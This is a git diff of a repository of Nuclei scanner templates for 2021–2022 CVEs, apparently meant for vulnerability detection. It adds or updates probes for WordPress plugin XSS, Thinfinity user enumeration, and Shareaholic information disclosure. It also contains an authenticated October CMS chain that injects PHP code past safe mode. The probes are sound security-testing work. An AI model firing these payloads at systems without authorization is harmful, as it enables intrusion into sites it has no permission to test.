'(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - type: status status: @@ -35,5 +48,4 @@ requests: - 302 - 307 - 308 - -# Enhanced by mp on 2022/02/28 +# digest: 4a0a004730450220187cab3673d4b39970accee9e374de2fc3060696feb954fe8352f18749b67a180221008264d516349f0b29d618482b160d6aceca10d043f5bb2da941e4d0430c7b2bc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2021-44848.yaml b/poc/cve/cve-2021-44848.yaml new file mode 100644 index 0000000000..44e18bfcb9 --- /dev/null +++ b/poc/cve/cve-2021-44848.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-44848 + +info: + name: Thinfinity VirtualUI User Enumeration + author: danielmofer + severity: medium + description: Thinfinity VirtualUI (before v3.0), /changePassword returns different responses for requests depending on whether the username exists. It may enumerate OS users (Administrator, Guest, etc.) + reference: + - https://github.com/cybelesoft/virtualui/issues/1 + - https://nvd.nist.gov/vuln/detail/CVE-2021-44848 + - https://www.tenable.com/cve/CVE-2021-44848 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-44848 + cwe-id: CWE-287 + tags: cve,cve2021,exposure,thinfinity,virtualui + +requests: + - raw: + - | + GET /changePassword?username=administrator HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - '"rc":(.*?)' + - '"msg":"(.*?)"' + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/28 diff --git a/poc/cve/cve-2021-45046.yaml b/poc/cve/cve-2021-45046.yaml index 68459a2a53..bd31b84a31 100644 --- a/poc/cve/cve-2021-45046.yaml +++ b/poc/cve/cve-2021-45046.yaml @@ -9,12 +9,13 @@ info: - https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/ - https://twitter.com/marcioalm/status/1471740771581652995 - https://logging.apache.org/log4j/2.x/ - tags: cve,cve2021,rce,oast,log4j,injection + - http://www.openwall.com/lists/oss-security/2021/12/14/4 classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9.00 + cvss-score: 9 cve-id: CVE-2021-45046 cwe-id: CWE-502 + tags: cve,cve2021,rce,oast,log4j,injection requests: - raw: diff --git a/poc/cve/cve-2021-46387.yaml b/poc/cve/cve-2021-46387.yaml index d0546f1944..1b5473b83f 100644 --- a/poc/cve/cve-2021-46387.yaml +++ b/poc/cve/cve-2021-46387.yaml @@ -8,14 +8,16 @@ info: reference: - https://www.exploit-db.com/exploits/50797 - https://nvd.nist.gov/vuln/detail/CVE-2021-46387 - metadata: - shodan-query: http.title:"Zywall2Plus" - tags: cve,cve2021,xss,zyxel + - https://www.zyxel.com/us/en/support/security_advisories.shtml + - https://drive.google.com/drive/folders/1_XfWBLqxT2Mqt7uB663Sjlc62pE8-rcN?usp=sharing classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-46387 cwe-id: CWE-79 + metadata: + shodan-query: http.title:"Zywall2Plus" + tags: cve,cve2021,xss,zyxel requests: - method: GET diff --git a/poc/cve/cve-2022-0208.yaml b/poc/cve/cve-2022-0208.yaml index 4ede2bc761..b9f0a551d6 100644 --- a/poc/cve/cve-2022-0208.yaml +++ b/poc/cve/cve-2022-0208.yaml @@ -1,31 +1,42 @@ id: CVE-2022-0208 info: - name: WordPress Plugin MapPress < 2.73.4 - Reflected XSS + name: WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting author: edoardottt severity: medium - description: The MapPress Maps for WordPress plugin before 2.73.4 does not sanitise and escape the mapid parameter before outputting it back in the "Bad mapid" error message, leading to a Reflected Cross-Site Scripting. + description: | + WordPress Plugin MapPress before version 2.73.4 does not sanitize and escape the 'mapid' parameter before outputting it back in the "Bad mapid" error message, leading to reflected cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Update to the latest version of MapPress (2.73.4 or higher) or apply the vendor-provided patch to fix the XSS vulnerability. + reference: + - https://wpscan.com/vulnerability/59a2abd0-4aee-47aa-ad3a-865f624fa0fc + - https://nvd.nist.gov/vuln/detail/CVE-2022-0208 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0208 cwe-id: CWE-79 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-0208 - - https://wpscan.com/vulnerability/59a2abd0-4aee-47aa-ad3a-865f624fa0fc - tags: cve,cve2022,mappress,xss,wordpress,wp-plugin + epss-score: 0.00106 + epss-percentile: 0.42122 + cpe: cpe:2.3:a:mappresspro:mappress:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: mappresspro + product: mappress + framework: wordpress + tags: cve2022,cve,mappress,xss,wordpress,wp-plugin,wpscan,mappresspro -requests: +http: - method: GET path: - "{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E" matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: header words: @@ -36,4 +47,9 @@ requests: words: - "" - "Bad mapid" - condition: and \ No newline at end of file + condition: and + + - type: status + status: + - 200 +# digest: 4b0a00483046022100b22a13c10631b7349f4edafe8cde23c314f46cc6c3661afdbef2141c2f9cab67022100adfeec912a26c02a2ba1982ccd3dddb34fab524142068da9e659428a5efd7e4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2022-0271.yaml b/poc/cve/cve-2022-0271.yaml new file mode 100644 index 0000000000..509d4c8894 --- /dev/null +++ b/poc/cve/cve-2022-0271.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-0271 + +info: + name: LearnPress < 4.1.6 - Reflected Cross-Site Scripting + author: Akincibor + severity: medium + description: The plugin does not sanitise and escape the lp-dismiss-notice before outputting it back via the lp_background_single_email AJAX action, leading to a Reflected Cross-Site Scripting + reference: + - https://wpscan.com/vulnerability/ad07d9cd-8a75-4f7c-bbbe-3b6b89b699f2 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0271 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0271 + cwe-id: CWE-79 + tags: xss,wp,wp-plugin,wordpress,cve,cve2022,learnpress + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{"dismissed":"xxx"}' + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2022-0281.yaml b/poc/cve/cve-2022-0281.yaml index 47e953bae5..e4526ab437 100644 --- a/poc/cve/cve-2022-0281.yaml +++ b/poc/cve/cve-2022-0281.yaml @@ -7,14 +7,16 @@ info: description: Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-0281 - tags: cve,cve2022,microweber,disclosure - metadata: - shodan-query: 'http.favicon.hash:780351152' + - https://github.com/microweber/microweber/commit/e680e134a4215c979bfd2eaf58336be34c8fc6e6 + - https://huntr.dev/bounties/315f5ac6-1b5e-4444-ad8f-802371da3505 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2022-0281 cwe-id: CWE-200 + metadata: + shodan-query: http.favicon.hash:780351152 + tags: cve,cve2022,microweber,disclosure requests: - method: GET diff --git a/poc/cve/cve-2022-0381.yaml b/poc/cve/cve-2022-0381.yaml index c467531f95..218010d191 100644 --- a/poc/cve/cve-2022-0381.yaml +++ b/poc/cve/cve-2022-0381.yaml @@ -5,14 +5,16 @@ info: author: edoardottt severity: medium description: The Embed Swagger WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to insufficient escaping/sanitization and validation via the url parameter found in the ~/swagger-iframe.php file which allows attackers to inject arbitrary web scripts onto the page, in versions up to and including 1.0.0. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-0381 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0381 + - https://gist.github.com/Xib3rR4dAr/4b3ea7960914e23c3a875b973a5b37a3 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2022-0381 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0381 cwe-id: CWE-79 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-0381 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0381 tags: cve,cve2022,swagger,xss,wordpress requests: diff --git a/poc/cve/cve-2022-0437.yaml b/poc/cve/cve-2022-0437.yaml index ed286b7568..24dedd6f3d 100644 --- a/poc/cve/cve-2022-0437.yaml +++ b/poc/cve/cve-2022-0437.yaml @@ -9,11 +9,10 @@ info: - https://huntr.dev/bounties/64b67ea1-5487-4382-a5f6-e8a95f798885 - https://github.com/karma-runner/karma/commit/839578c45a8ac42fbc1d72105f97eab77dd3eb8a - https://nvd.nist.gov/vuln/detail/CVE-2022-0437 - - https://huntr.dev/bounties/64b67ea1-5487-4382-a5f6-e8a95f798885 - https://github.com/karma-runner/karma classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2022-0437 cwe-id: CWE-79 tags: cve,cve2022,karma,xss,oss diff --git a/poc/cve/cve-2022-0594.yaml b/poc/cve/cve-2022-0594.yaml new file mode 100644 index 0000000000..a23d3ef545 --- /dev/null +++ b/poc/cve/cve-2022-0594.yaml @@ -0,0 +1,56 @@ +id: CVE-2022-0594 + +info: + name: WordPress Shareaholic <9.7.6 - Information Disclosure + author: atomiczsec + severity: medium + description: WordPress Shareaholic plugin prior to 9.7.6 is susceptible to information disclosure. The plugin does not have proper authorization check in one of the AJAX actions, available to both unauthenticated (before 9.7.5) and authenticated (in 9.7.5) users, allowing them to possibly obtain sensitive information such as active plugins and different versions (PHP, cURL, WP, etc.). + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the target system. + remediation: | + Update the Shareaholic plugin to version 9.7.6 or later to fix the information disclosure vulnerability. + reference: + - https://wpscan.com/vulnerability/4de9451e-2c8d-4d99-a255-b027466d29b1 + - https://wordpress.org/plugins/shareaholic/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0594 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0594 + - https://github.com/20142995/sectool + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-0594 + cwe-id: CWE-863 + epss-score: 0.00188 + epss-percentile: 0.55305 + cpe: cpe:2.3:a:shareaholic:shareaholic:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + vendor: shareaholic + product: shareaholic + framework: wordpress + tags: cve,cve2022,wordpress,wp,wp-plugin,exposure,wpscan,shareaholic + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'plugin_version' + - 'shareaholic_server_reachable' + condition: and + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 +# digest: 4a0a00473045022026e65f1c90c6eaf9ba5e9c3b8e4f427ce9aa3f172726d7f11a359aef9ff18913022100ea92da8d8af3bd508e47e670034d7298492987012965f9bfbc5b403cf1fd12da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2022-1221.yaml b/poc/cve/cve-2022-1221.yaml new file mode 100644 index 0000000000..63d246697b --- /dev/null +++ b/poc/cve/cve-2022-1221.yaml @@ -0,0 +1,57 @@ +id: CVE-2022-1221 + +info: + name: WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting + author: veshraj + severity: medium + description: | + Wordpress Gwyn's Imagemap Selector plugin 0.3.3 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize the id and class parameters before returning them back in attributes. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Update to the latest version of the WordPress Gwyn's Imagemap Selector plugin (0.3.3) or apply the vendor-supplied patch to fix the vulnerability. + reference: + - https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1221 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-1221 + cwe-id: CWE-79 + epss-score: 0.00106 + epss-percentile: 0.42899 + cpe: cpe:2.3:a:gwyn\'s_imagemap_selector_project:gwyn\'s_imagemap_selector:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 2 + vendor: gwyn\'s_imagemap_selector_project + product: gwyn\'s_imagemap_selector + framework: wordpress + tags: cve,cve2022,wpscan,xss,wordpress,wp-plugin,wp,gwyn\'s_imagemap_selector_project + +http: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - " popup-" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4b0a00483046022100b813f9d2d16430497182247582f15c356c7b1a9b8b6a0862114ae8e816c89c38022100931fc1b8c65961d688627b2d3a80763e2ecd55f35da036b373aa7a0753d9f77b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2022-1724.yaml b/poc/cve/cve-2022-1724.yaml index 4d8d919d39..f94177211d 100644 --- a/poc/cve/cve-2022-1724.yaml +++ b/poc/cve/cve-2022-1724.yaml @@ -1,23 +1,37 @@ id: CVE-2022-1724 info: - name: Simple Membership < 4.1.1 - Reflected Cross-Site Scripting + name: WordPress Simple Membership <4.1.1 - Cross-Site Scripting author: Akincibor severity: medium - description: The plugin does not properly sanitise and escape parameters before outputting them back in AJAX actions, leading to Reflected Cross-Site Scripting. + description: WordPress Simple Membership plugin before 4.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape parameters before outputting them back in AJAX actions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Update to the latest version of WordPress Simple Membership plugin (4.1.1 or higher) to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/96a0a667-9c4b-4ea6-b78a-0681e9a9bbae - https://nvd.nist.gov/vuln/detail/CVE-2022-1724 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-1724 cwe-id: CWE-79 + epss-score: 0.00106 + epss-percentile: 0.42122 + cpe: cpe:2.3:a:simple-membership-plugin:simple_membership:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve,cve2022,wp-plugin,xss,wp,wordpress + verified: true + max-request: 1 + vendor: simple-membership-plugin + product: simple_membership + framework: wordpress + tags: cve,cve2022,xss,wp,wordpress,wpscan,wp-plugin,simple-membership-plugin -requests: +http: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E' @@ -37,3 +51,4 @@ requests: - type: status status: - 200 +# digest: 4b0a00483046022100ddecda667462879dc30af233223a0c781d567c45ae573c08b0435ec8f8da44c6022100a500645021b08232ae034f03db8b1805850494a5da77ed5cdd96ad25d2710f5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2022-1906.yaml b/poc/cve/cve-2022-1906.yaml new file mode 100644 index 0000000000..c7f69c82e4 --- /dev/null +++ b/poc/cve/cve-2022-1906.yaml @@ -0,0 +1,57 @@ +id: CVE-2022-1906 + +info: + name: WordPress Copyright Proof <=4.16 - Cross-Site-Scripting + author: random-robbie + severity: medium + description: | + WordPress Copyright Proof plugin 4.16 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users when a specific setting is enabled. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Update to the latest version of WordPress Copyright Proof plugin (>=4.17) which includes proper input sanitization and validation. + reference: + - https://wpscan.com/vulnerability/af4f459e-e60b-4384-aad9-0dc18aa3b338 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1906 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/cyllective/CVEs + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-1906 + cwe-id: CWE-79 + epss-score: 0.00086 + epss-percentile: 0.35299 + cpe: cpe:2.3:a:digiprove:copyright_proof:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + vendor: digiprove + product: copyright_proof + framework: wordpress + google-query: inurl:/wp-content/plugins/digiproveblog + tags: cve,cve2022,wordpress,xss,wp-plugin,wp,wpscan,digiprove + +http: + - raw: + - | + GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "got message " + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4a0a004730450220111642dd830f905e2bc61167a87ef7ebcfd011ba7a4a363b319011a140401c71022100b7518f220308a6293499e4376ea4c4ab4f15e4049da8ad1de2f82d91395dbe62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2022-1937.yaml b/poc/cve/cve-2022-1937.yaml new file mode 100644 index 0000000000..d258094795 --- /dev/null +++ b/poc/cve/cve-2022-1937.yaml @@ -0,0 +1,53 @@ +id: CVE-2022-1937 + +info: + name: WordPress Awin Data Feed <=1.6 - Cross-Site Scripting + author: Akincibor,DhiyaneshDK + severity: medium + description: | + WordPress Awin Data Feed plugin 1.6 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action, available to both unauthenticated and authenticated users. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Update to the latest version of the WordPress Awin Data Feed plugin (1.6 or higher) to mitigate this vulnerability. + reference: + - https://wpscan.com/vulnerability/eb40ea5d-a463-4947-9a40-d55911ff50e9 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1937 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/cyllective/CVEs + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-1937 + cwe-id: CWE-79 + epss-score: 0.00086 + epss-percentile: 0.35299 + cpe: cpe:2.3:a:awin:awin_data_feed:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 2 + vendor: awin + product: awin_data_feed + framework: wordpress + tags: cve,cve2022,xss,awin,wpscan,wp-plugin,wp,wordpress,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin-ajax.php?action=get_sw_product&title=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(header_2, "text/html")' + - 'status_code_2 == 200' + - contains(body_2, 'colspan=\"2\">') + condition: and +# digest: 490a004630440220170ac3b82ccb9b570e6bb77c89e795bb00812e13535321c65b180d3fba90263d02207f790f63af137d15a3858b4531a0d2f5502f534a8167ff14abeae04f17ac12fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2022-1946.yaml b/poc/cve/cve-2022-1946.yaml index 3bd3f2a941..93582af860 100644 --- a/poc/cve/cve-2022-1946.yaml +++ b/poc/cve/cve-2022-1946.yaml @@ -1,25 +1,36 @@ id: CVE-2022-1946 info: - name: Gallery < 2.0.0 - Reflected Cross-Site Scripting + name: WordPress Gallery <2.0.0 - Cross-Site Scripting author: Akincibor severity: medium - description: The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting issue. + description: WordPress Gallery plugin before 2.0.0 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the response of an AJAX action, available to both unauthenticated and authenticated users. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement. + remediation: | + Update the WordPress Gallery plugin to version 2.0.0 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/0903920c-be2e-4515-901f-87253eb30940 - https://wordpress.org/plugins/gallery-album - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1946 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1946 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-1946 cwe-id: CWE-79 + epss-score: 0.00099 + epss-percentile: 0.40609 + cpe: cpe:2.3:a:wpdevart:gallery:*:*:*:*:*:wordpress:*:* metadata: - google-dork: inurl:"/wp-content/plugins/gallery-album/" - verified: "true" - tags: cve,cve2022,wp-plugin,xss,wp,wordpress,gallery,unauth + verified: true + max-request: 1 + vendor: wpdevart + product: gallery + framework: wordpress + google-query: inurl:"/wp-content/plugins/gallery-album/" + tags: cve,cve2022,wpscan,wp,xss,wordpress,gallery,unauth,wp-plugin,wpdevart -requests: +http: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=wpda_gall_load_image_info&start=0&limit=1&gallery_current_index=' @@ -39,3 +50,4 @@ requests: - type: status status: - 200 +# digest: 4b0a00483046022100de9854862499f54000eee541fe9ed534888af6a709cc4753214aa85424535685022100f4f4938dba2d4515ba543045ba25971f95cc1f44d0beb3c0dc565279be8c8554:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2022-21371.yaml b/poc/cve/cve-2022-21371.yaml index 32db7db2f1..261214bd05 100644 --- a/poc/cve/cve-2022-21371.yaml +++ b/poc/cve/cve-2022-21371.yaml @@ -11,7 +11,7 @@ info: - https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2022-21371 tags: cve,cve2022,lfi,weblogic,oracle diff --git a/poc/cve/cve-2022-21705.yaml b/poc/cve/cve-2022-21705.yaml new file mode 100644 index 0000000000..b697414512 --- /dev/null +++ b/poc/cve/cve-2022-21705.yaml @@ -0,0 +1,116 @@ +id: CVE-2022-21705 + +info: + name: October CMS - Remote Code Execution + author: iPhantasmic + severity: high + description: | + October CMS is susceptible to remote code execution. In affected versions, user input is not properly sanitized before rendering. An authenticated user with the permissions to create, modify, and delete website pages can bypass cms.safe_mode and cms.enableSafeMode in order to execute arbitrary code. This affects admin panels that rely on safe mode and restricted permissions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + The issue has been patched in Build 474 (1.0.474) and 1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe manually to installation. + reference: + - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe + - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22 + - https://cyllective.com/blog/post/octobercms-cve-2022-21705/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-21705 + - https://github.com/cyllective/CVEs + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-21705 + cwe-id: CWE-74,NVD-CWE-Other + epss-score: 0.00522 + epss-percentile: 0.76405 + cpe: cpe:2.3:a:octobercms:october:*:*:*:*:*:*:*:* + metadata: + max-request: 5 + vendor: octobercms + product: october + tags: cve2022,cve,authenticated,rce,cms,octobercms,injection + +http: + - raw: + - | # to obtain session_key and token + GET /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + - | # to perform authentication and obtain admin cookies + POST /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + _session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}} + - | # to inject php code in Markup editor and perform exploit + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onSave + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0 + - | # to obtain theme + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onCreateTemplate + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&search=&type=page + - | # to access the template page for generated exploit + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onOpenTemplate + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'function onInit()' + - 'phpinfo()' + - 'Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`.' + condition: and + + # if exploit executes, phpinfo() should now be exposed at the /{{randstr}} endpoint, even though Safe mode is enabled + + - type: status + status: + - 200 + + extractors: + - type: xpath + name: session_key + internal: true + xpath: + - "/html/body/div[1]/div/div[2]/div/div/form/input[1]" + attribute: value + + # Obtain _session_key for current OctoberCMS session + + - type: xpath + name: token + internal: true + xpath: + - "/html/body/div[1]/div/div[2]/div/div/form/input[2]" + attribute: value + + # Obtain _token for current OctoberCMS session + + - type: regex + name: theme + group: 1 + regex: + - '' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "Contact Form 7" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 490a004630440220135e8e57aec52c36062249a9f60be0fd5bb87f786de39d6a8fbfe9a3c76dc61402205d74f1cbbc26e6b54ae5d6133836104c105071da796608ae749dddbe1863f8d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2022-22536.yaml b/poc/cve/cve-2022-22536.yaml index 6afb76b607..7b9308b289 100644 --- a/poc/cve/cve-2022-22536.yaml +++ b/poc/cve/cve-2022-22536.yaml @@ -15,9 +15,7 @@ info: cvss-score: 10 cve-id: CVE-2022-22536 cwe-id: CWE-444 - metadata: - shodan-query: http.favicon.hash:-266008933 - tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes,kev + tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes requests: - raw: diff --git a/poc/cve/cve-2022-22947.yaml 